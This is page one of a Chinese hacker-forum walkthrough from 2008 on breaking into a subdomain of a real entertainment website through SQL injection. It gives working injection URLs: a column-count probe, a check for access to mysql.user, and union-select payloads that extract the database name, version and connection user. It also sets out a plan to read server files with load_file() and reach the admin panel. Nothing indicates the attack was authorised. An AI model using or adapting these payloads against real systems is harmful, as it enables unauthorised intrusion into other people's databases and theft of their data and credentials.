黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·对偶偶娱乐分站服务器的04-23·轻松破解gmail,hotmail信04-23
·易上传无限网络硬盘04-22·814e超级强大的免费个人04-22
·幻宇科技提供100M免费全04-21·就是论坛提供免费全能空04-19
·申请9999.la为后缀的免费04-18·Freepowerboards提供php04-18
·炫乐网免费二级域名申请04-18·YoForums提供phpBB3免费04-18
·Ettercap-交换环境下的嗅04-17·突破任意ARP防火墙的工具04-17
·判断系统补丁04-17·Flash Player漏洞的新利04-17
·海晨互联免费送.cn域名04-17·Lefora免费论坛空间申请04-17
·25M免费PHP空间(有MYSQ04-16·利用Gmail插件Gmail Rom04-15
·Mysql5注射技巧总结浓缩04-15·Sql2005注射辅助脚本[粗04-15
·沸腾展望新闻系统任意文04-15·国内上传最快速流畅的BR04-15
·国外100M可绑域名免费ph04-14·关于public权限执行系统04-13
·关于<<二行代码解决全部04-13·二行代码解决全部网页木04-13
·GoodAddress免费主页空间04-13·美国koz为您提供100M免费04-11
[图文]对偶偶娱乐分站服务器的安全检测
      ★★★★★

对偶偶娱乐分站服务器的安全检测

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-4-23 10:27:44

http://xx. uou.com/booklook.php?id=28 order by 25

字段数知道了,下面来进一步进行渗透。。。哦,对了,我们先看看这个数据库的账户有没有写的权限,如果没有我们就无法load_file()来读取文件了!可以看页面返回的结果来判断,返回正常页面说明有写的权限,呵呵。
http://xx.ouou.com/booklook.php?id=28 and (select count(*) from mysql.user)>0 /*

Highslide JS

返回正常,我们进行下一步的渗透!上面说了,字段数已经确定是25了,好了我们来构造注入语句!
http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

返回页面如下图

Highslide JS

检测一下具体的,数据库连接账户,数据名和数据库版本
http://xx.ouou.com/booklook.php?id=28%20and%201=2%20union%20select%201,2,database(),4,version(),6,7,user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*


Highslide JS

MYSQL的数据库是5.0的,这样可以很方便的注入,可以像MSSQL那样的注入(小沈阳:这是为什么呢?),我在这里就不重复了,有兴趣的可以到http://www.337479.cn/read.php?40这来看!我在查询管理员账户和密码的时候废了很长时间,没有查出来,呵呵!后台我已经先找到了http://xx.ouou.com/admin,进去一看。。。

Highslide JS

开始以为是本地验证的机制呢。。。因为数据库连接账户有写的权限,可以load_file()来读取本地文件!

上一页  [1] [2] [3] 下一页

文章录入:cainiaowang    责任编辑:xinlian 
  • 上一篇文章:

  • 下一篇文章: 没有了
  • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    VIP 专 区
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886